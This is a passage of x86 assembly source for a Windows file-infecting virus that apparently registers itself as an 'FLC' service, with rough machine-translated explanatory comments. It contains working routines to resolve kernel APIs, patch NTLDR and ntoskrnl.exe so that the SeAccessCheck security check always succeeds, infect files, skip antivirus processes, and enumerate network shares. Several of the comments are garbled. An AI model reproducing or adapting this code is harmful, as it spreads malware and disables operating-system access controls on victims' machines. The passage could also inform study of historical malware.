JMP Short WG_03; WG_02: Add EDI, 03; After found, assign the value to the variable getProcaddress; MOV [getProcaddress 1 @], edi; add 1 is because the first bit is the machine code of MOV AX MOV EAX, EDX; Save the base address of Kernel32, MOV [kernel32_base @], EAX; prepare for the following operations; WG_03: Ret; return Whereis_GPA ENDP ; ------------------------------------------------- ------------------------; ; -------------------------------------------------------------; ; ------------------------------------------------- ------------------------; DLL_RELOCATE PROC PASCAL NEAR Arg DLL_BASE: DWORD, the base address is the value of EAX in which the call is called; DLL_FUNC: DWORD; get the first address of the name of the name to find the API; Uses ESI; save ESI, automatically recover after the end of this process; MOV ESI, DLL_FUNC; give the address to ESI, you can do source string addresses in string operations; DR_00: MOV EAX, ESI; EAX is now the address of the string of the API; Add Eax, 07; to the seventh byte; PUSH EAX; address is incorporated; Push DLL_BASE; KERNEL32 base address, giving getProcAddress as a parameter; Call getProcaddress; call getProcAddres to get the address of other common APIs, pay attention Not included here list of the names of the advanced API; For example: CloseHandle: DB 0B8,?,?,?,?, 0f, 0e0, 'closehandle, 0 1 2 3 4 5 6 7 8 When ADD EAX, 07 starts from 0b8 (0B8 is the machine code of MOV AX) plus 7 It's a string that you can take a string of string; In addition, the structure, 0B8 is MOV AX, and 0FFE0 is the machine code of JMP AX Let's take a look at the addresses of the 4 bytes of the 4 bytes behind. Let's take a look. The assembly code here knows; 0b8, ???? Corresponding to MOV AX, ???? -> Here ???? is the address after looking up, it is a sentence to find it. The whole statement; 0FF, 0E0 corresponds to JMP AX --- >> I understand here, it is to jump to the address represented by AX. . It is the API here; OR EAX, EAX; JZ Short DR_03; Return Value If 0, fail, jump to DR_03 execution; DR_01: MOV [ESI 1], EAX; now here is clear, ESI 1 is the address of the four ????, and Eax is The getProcAddress is executed after the representative's current search API in the entrance address inside Krnel32; Add ESI, 07; Note: The above is [ESI 1], not ESI 1, the value of ESI has not changed, plus 7, then the bit of the string Set; DR_02: Lodsb ----- | OR Al, Al | Here is a one-byte comparison is '0', why do you do this? JNZ Short DR_02 ----- | Let's take a look at the structure above. After 7 bytes, it is the name of the API. Because the name is short, it only adds 7, and then uses 0 as a sign ended as a determination API name string; CMP BYTE PTR [ESI], 0B8; here is simple, whether it is 0B8, and it is judged to have arrived at the second line; JZ Short DR_00; Yes, continue to find the remaining API until it is finished; DR_03: Ret; return; DLL_RELOCATE ENDP ; ------------------------------------------------- ------------------------; ; --------------------- NT Security Patch Routine --------------------; ; ------------------------------------------------- ------------------------; Blownaway Proc Pascal Near Arg Dirend: DWORD; get the last bit of the current string inside Buffer1; Uses ESI, EDI; Save ESI, EDI value, restore after completion of this process; Lea ESI, [NTLDR @] ----- | MOV EDI, DIREND | Movsd | Movsd ----------- | Constructs the string of x: / NTLDR, in Buffer1; Lea EDI, [Buffer1 @]; the current address of Buffer1 enters EDI; Lea ESI, [NT4_NTLDR @]; NT's NTLDR's first address enters ESI; CMP BYTE PTR [OS @], 01; Compare whether it is NT, JZ Short BA_00; is the step of performing a patch; Add ESI, 5 * 2; not NT, then ESI points to the location of the variable w2k_ntldr, considered to be a 2K system; BA_00: Push EDI; ------- | Push ESI | PUSH 05 | Call Patchfile --- | Start to patch to NTLDR; Lea ESI, [NTOSKRNL @] ---------------- | MOV EDI, DIREND | Construction, such as x: /winnt/system32/ntoskrnl.exe | character string; | BA_01: | | Movsb | CMP BYTE PTR [ESI - 1], 00 | JNZ Short Ba_01 --------------------- | Lea EDI, [Buffer1 @] ---------------- | LEA ESI, [NT4_NTOSKRNL @] | | CMP Byte PTR [OS @], 01 | JZ Short BA_02 | Add ESI, 9 * 2 | | BA_02: | | Push EDI | Push ESI | Push 09 | Call Patchfile ---------------------- | Tap ntoskrnl.exe, similar to the above; RET is over, the task of playing patch, can be taken, and the seam is also tired; Blownaway endp ; ------------------------------------------------- ------------------------; ; ------------------------- File Patch Routine --------------------- ---; ; ------------------------------------------------- ------------------------; Patchfile Proc Pascal Near Arg P_FileName: DWORD, / get file name; p_patchaddr: dword, / get the patch address; P_patchsize: DWORD gets the number of cycles, here is the length of the string of the instruction to be modified; Local p_filehandle: dWord, / Define local variables, store file handles; p_filesize: dword, / define local variables, save file size; P_mapHandle: DWORD / Define local variables, store memory mapping file handles; Uses ESI, EDI; Save ESI, EDI, automatic recovery after the end of this process; Push p_filename ---- | Push 03 | Call openfile ------ | Judging whether the file exists; CMP EAX, -1 --------- | JZ short pa_exit ---- | Do not exit; MOV P_FILEHANDLE, EAX; save the handle; Push 00 ------------- | Push eax | Call getFileSize ---- | Get file size; MOV P_FILESIZE, EAX; save file size; Push p_filehandle --- | Push eax | Call MapFile -------- | Establish a memory map file; OR EAX, EAX JZ short pa_closefile; failure, jump off the file; MOV P_MAPHANDLE, EAX; save the memory mapping file handle; Push EAX ------- | Call viewMap ---- | Mapping memory object; or Eax, EAX ------------ | JZ short pa_closemap --- | Failure turns off the memory mapping file; MOV EDX, EAX; Success, save the handle; MOV EDI, EAX; save the file in memory; MOV ESI, P_PATCHADDR; put the first address of the patch string to ESI, prepare the following comparison; MOV ECX, P_FileSize; get the next loop comparison to prepare the following cycle; PA_00: PUSH ECX; Stack Save Cycle; Push ESI; stack save patch string address; Push EDI; Document Address in the memory into the stack; MOV ECX, P_PATCHSIZE; patch size home, here is the number of internal cycles; REPZ CMPSB; Comparison, 5 groups; POP EDI POP ESI POP ECX JZ Short PA_01; found, then modify; INC EDI; Didn't find, EDI plus 1, move one after memory LOOP PA_00; Continue to find, ECX minus 1; JMP short pa_unmap; if there is no found end, go to PA_UNMAP to clean up; PA_01: MOV ECX, P_PATCHSIZE ---------- Add ESI, ECX | REPZ MOVSB ----------------- | PA_UNMAP: Push EDX; the handle of the stored memory mapping file can work; Call unmapViewoffile; release mapping in the current application's memory address space PA_Closemap: Push p_maphandle; Turn off a kernel object (unless all references to the object have been turned off, otherwise Call CloseHandle; will be deleted actually; PA_CLOSEFILE: Push p_filehandle; turn off the file object; Call closehandle; PA_EXIT: RET Patchfile ENDP ; ------------------------------------------------- ------------------------; ; -------------------------------------------- ------; ; ------------------------------------------------- ------------------------; GetVs: Call $ 5 POP EBX Sub EBX, Offset Getvs 5 - vStart RET ; ------------------------------------------------- ------------------------; ; ------------------------------------------------- ------------------------; Relockernel32 Proc Pascal Near Arg r_kernel32: DWORD; Press the value of the input to the variable, that is, the return address of the kernel32; PUSH R_kernel32; Push, use the stack transfer parameter to the following call; Call whereis_gpa; positioning the address of getProcadDress, found another API behind it Do it; OR EAX, EAX; Eax is the value after the WHEREIS_GPA execution, the current value of Kernel32; JZ Short RK_00; judgment is successful, failure PUSH EAX; Press Eax, with a pile-passing DLL_RELOCATE process; Lea ESI, [kernel32_functions @]; incoming the first address of the API's name string into ESI, find the API below Prepare for the site; PUSH ESI Call DLL_Relocate; start looking for an API to get the address of the API; RK_00: Ret; return; Relockernel32 ENDP ; ------------------------------------------------- ------------------------; ; ------------------------------------------------- ------------------------; Relocadvapi32 proc near Lea Eax, [Advapi32_name @]; the address of the name string of the advanced API; Push eax; stack Call loadLibrarya; loading advapi32.dll via LoadLibrary OR EAX, EAX ------ | JZ Short Ra_00 - | Failure to exit; Push EAX ----------------------------- | The EAX here is the address of the DLL after loading, search the API | Lea ESI, [Advapi32_Functions @] | Push ESI | Call DLL_RELOCATE -------------------- | Successfully started searching the Advapi32 Advance API address RA_00: RET Relocadvapi32 ENDP ; ------------------------------------------------- ------------------------; ; ------------------------------------------------- ------------------------; OpenFile Proc Pascal Near Arg O_FileName: DWORD, / from the stack to the file name; o_OpenMode: DWORD from the stack to open mode; PUSH 20 -------- | Push o_filename | Call setFileAttributesa ----- | Set the properties of the file; Push 00 --------------------- | PUSH 80 | Push O_OpenMode | Push 00 | Push 00 | Push 0C0000000 | Push o_filename | Call CreateFilea ------------ | Open a file to read and write; RET OpenFile Endp ; ------------------------------------------------- ------------------------; ; ------------------------------------------------- ------------------------; MapFile Proc Pascal Near Arg M_FileHandle: DWORD, / from the stack to the file handle; M_FileSize: DWORD The size of the file is obtained from the stack; Push 00 ----------------- | Push m_filesize | Push 00 | Push 04 | Push 00 | Push m_filehandle | Call createFilemappingA- | Establish a memory map file to establish the size of the parameters; RET MapFile Endp ; ------------------------------------------------- ------------------------; ; ------------------------------------------------- ------------------------; ViewMap Proc Pascal Near Arg v_maphandle: dword; get a memory map handle; Push 00 -------------- | Push 00 | Push 00 | Push 02 | Push v_maphandle | Call MapViewOffile --- | Mapping the file mapping object to the address space of this program; RET ViewMap Endp ; ------------------------------------------------- ------------------------; ; ------------------------------------------------- ------------------------; WAIT_A_LITTLE PROC NEAR Call gettickcount --- | Sub eax, [Tick @] --- | Obtaining the current time and starting to save if it is more than 4 seconds CMP EAX, 4 * 1000D ---- | JC Short Wal_00 --- | No infection files continue; Push 16D * 1000D ------- | Call Sleep ----------- | More than 4 seconds, but sleep 16 seconds; Call gettickcount ---- | MOV [Tick @], EAX ---- | Save the time after the sleep is held in Tick as the next time WAL_00: RET WAIT_A_LITTLE ENDP ; ------------------------------------------------- ------------------------; ; ------------------------------------------------- ------------------------; Getrand Proc Near Push ECX Push Edx Mov Eax, [Rand @] XOR EDX, EDX MOV ECX, 7FFFFFF Mul ECX INC EAX MOV ECX, 0FFFFFFFBH Div ECX MOV EAX, EDX MOV [Rand @], EAX POP EDX POP ECX RET Getrand Endp ; ------------------------------------------------- ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- - Initialized Data -------------------------; ; ------------------------------------------------- ------------------------; HostcoDe DB 8 DUP (?) GPA_SIGS: W9X DB 0C2, 04, 00, 57, 6A, 22, 2BH, 0D2 NT4 DB 0C2, 04, 00, 55, 8BH, 4C, 24, 0C W2K DB 00F, 00, 00, 55, 8BH, 0ECH, 51, 51 NTLDR DB 'NTLDR', 0 NT4_NTLDR DB 3BH, 46, 58, 74, 07; Signature (File Check) DB 3BH, 46, 58, 0EBH, 07; PATCH W2K_NTLDR DB 3BH, 47, 58, 74, 07 DB 3BH, 47, 58, 0EBH, 07 Ntoskrnl DB 'Winnt / System32 / Ntoskrnl.exe', 0 NT4_NTOSKRNL DB 8A, 0C3, 5F, 5E, 5BH, 5DH, 0C2, 28, 00; SEACCESSCHECK DB 0B0, 01, 5F, 5E, 5BH, 5DH, 0C2, 28, 00 W2K_NTOSKRNL DB 8A, 45, 14, 5F, 5E, 5BH, 5DH, 0C2, 28 DB 0B0, 01, 90, 5F, 5E, 5BH, 5DH, 0C2, 28 Skipnames: DD 139D7300H; Aler DD 0F977200H; amon DD 118E7E1EH; _AVP DD 52886900H; AVP3 DD 0C886900H; AVPM DD 13883207H; F-PR DD 168E7E0FH; NAVW DD 0F997C12H; SCAN DD 128B7212H; SMSS DD 04907B05H; DDHE DD 00946F05H; DPLA DD 00946F0CH; MPLA Process DB 'Flcss.exe', 0 Service DB 'FLC', 0 MINIMAL IMPORT Section VIMPORTS: DD offset kernel32_pointers i DD -1, -1 DD offset kernel32_name i DD Offset Kernel32_Relocated i DB 14 DUP (0) KERNEL32_POINTERS DD Offset Kernel32_Beep i, 0 KERNEL32_RELOCATED DD OFFSET KERNEL32_BEEP I, 0 KERNEL32_BEEP DB?,?, 'Beep', 0 Virus imports KERNEL32_NAME DB 'KERNEL32.DLL', 0 Kernel32_functions: CloseHandle: DB 0B8,?,?,?,?, 0f, 0e0, 'closehandle', 0 CreateFilea: DB 0B8,?,?,?,?, 0f, 0e0, 'createfilea, 0 CreateFilemappinga: DB 0B8,?,?,?,?,?, 0f, 0e0, 'createfilemappinga, 0 CreateProcessa: DB 0B8,?,?,?,?, 0e, 0createthread: DB 0B8,?,?,?,?,?, 0F, 0E0, 'Createthread', 0 FindfirstFilea: DB 0B8,?,?,?,?, 0f, 0e0, 'findfirstfilea, 0 FINDNEXTFILEA: DB 0B8,?,?,?,?, 0f, 0e0, 'findnextfilea, 0 FindClose: DB 0B8,?,?,?,?, 0f, 0e0, 'findclose', 0 GetCurrentProcessid: DB 0B8,?,?,?,?, 0f, 0e0, 'getcurrentprocessid', 0 GetDriveTypea: DB 0B8,?,?,?,?, 0f, 0e0, 'getDrivetypea, 0 GetFileSize: DB 0B8,?,?,?,?, 0f, 0e0, 'getfilesize', 0 GetProcaddress: db 0b8,?,?,?,?, 0f, 0e0, 'getprocaddress', 0 GettickCount: DB 0B8,?,?,?,?, 0f, 0e0, 'gettickcount', 0 GetsystemDirectorya: DB 0B8,?,?,?,?, 0f, 0e0, 'getsystemdirectorya, 0 LoadLibraryA: DB 0B8,?,?,?,?, 0f, 0e0, 'loadinglibrarya', 0 MapViewOffile: DB 0B8,?,?,?,?,?, 0f, 0e0, 'mapviewoffile', 0 READFILE: DB 0B8,?,?,?, 0f, 0e0, 'readfile', 0 SetFileAttributesa: DB 0B8,?,?,?,?, 0f, 0e0, 'setfileattributesa, 0 SetFileTime: DB 0B8,?,?,?,?, 0f, 0e0, 'setfiletime', 0 Sleep: DB 0B8,?,?,?,?, 0f, 0e0, 'sleep', 0 UnmapViewoffile: DB 0B8,?,?,?,?, 0f, 0e0, 'unmapviewoffile', 0 Virtualalloc: DB 0B8,?,?,?,?, 0f, 0e0, 'virtualaloc', 0 VirtualFree: DB 0B8,?,?,?,?, 0f, 0e0, 'virtualfree', 0 Writefile: db 0b8,?,?,?,?, 0f, 0e0, 'writefile', 0 This function does Only Exist under Win9x DB 0 RegisterServiceProcess: DB 0B8,?,?,?,?, 0f, 0e0, 'registerServiceProcess', 0 USER32_NAME DB 'User32.dll', 0 Registerclassa: DB 0B8,?,?,?,?, 0f, 0e0, 'registerclassa, 0 Advapi32_name db 'advapi32.dll', 0 Advapi32_functions: OpenSCManagera: DB 0B8,?,?,?,?, 0f, 0e0, 'openscmanagera', 0 OpenServicea: DB 0B8,?,?,?,?, 0f, 0createservicea: db 0b8,?,?,?,?,?, 0f, 0e0, 'createservicea', 0 StartServicea: DB 0B8,?,?,?,?, 0f, 0e0, 'startservicea, 0 StartServiceCtrldispatchera: DB 0B8,?,?,?,?, 0f, 0e0, 'startservicectrldispatchera', 0 RegisterServiceCtrlHandlera: DB 0B8,?,?,?,?, 0f, 0e0, 'registerServiceCtrlhandlera', 0 SetServiceStatus: db 0b8,?,?,?,?, 0f, 0e0, 'setServiceStatus', 0 MPR_NAME DB 'MPR.DLL', 0 MPR_Functions: WNETOpenENUMA: DB 0B8,?,?,?,?, 0FF, 0E0, 'WNETOpenENUMA', 0 WneetenumResourceA: DB 0B8,?,?,?,?,?, 0f, 0e0, 'WnetenumResourcea, 0 WNETCLOSEENUM: DB 0B8,?,?,?,?,?, 0f, 0e0, 'wnetcloseenum', 0 Vend: ; ------------------------------------------------- ------------------------; ; ------------------------- uninitialized data ---------------------- -; ; ------------------------------------------------- ------------------------; KERNEL32_BASE DD? RAND DD? Tick DD? OS DB? ALIGN 100 Buffer1 DB 200 DUP (0); CURRENT DIRECTORY Buffer2 DB 200 DUP (?); Search Buffer Buffer3 DB 2000 DUP (?); Read Buffer VSIZE EQU Offset Vend - vStart Phys_vsize EQU 1000 Virt_vsize EQU 4000 Code ends End main
